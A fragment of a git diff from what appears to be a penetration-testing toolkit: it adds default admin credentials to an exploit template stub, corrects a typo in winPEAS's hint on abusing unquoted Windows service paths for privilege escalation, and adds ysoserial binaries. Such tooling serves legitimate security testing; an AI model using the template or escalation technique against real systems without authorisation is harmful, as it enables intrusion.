pool.map(_paramiko_tunnel, usernames) - - - - diff --git a/template.py b/template.py index ed64fb9..b8c1364 100755 --- a/template.py +++ b/template.py @@ -16,6 +16,8 @@ from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" +USERNAME = "admin" +PASSWORD = "password" def login(username, password): # Template method to create a session @@ -32,7 +34,7 @@ def exploit(session, payload): pass if __name__ == "__main__": - session = login() + session = login(USERNAME, PASSWORD) exploit(session, "id") """ % baseUrl diff --git a/win/accesschk.exe b/win/accesschk.exe index 74f038b..6fc4abf 100644 Binary files a/win/accesschk.exe and b/win/accesschk.exe differ diff --git a/win/accesschk64.exe b/win/accesschk64.exe index 7683dd9..0c1c01c 100644 Binary files a/win/accesschk64.exe and b/win/accesschk64.exe differ diff --git a/win/winPEAS.bat b/win/winPEAS.bat index da25cd4..9f97875 100644 --- a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -451,7 +451,7 @@ CALL :T_Progress 1 :UnquotedServicePaths CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" -ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' +ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] The permissions are also checked and filtered using icacls ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( diff --git a/win/ysoserial/NDesk.Options.dll b/win/ysoserial/NDesk.Options.dll new file mode 100644 index 0000000..df45878 Binary files /dev/null and b/win/ysoserial/NDesk.Options.dll differ diff --git a/win/ysoserial/ysoserial.exe b/win/ysoserial/ysoserial.exe new file mode 100644 index 0000000..f45f4f3 Binary files /dev/null and b/win/ysoserial/ysoserial.exe differ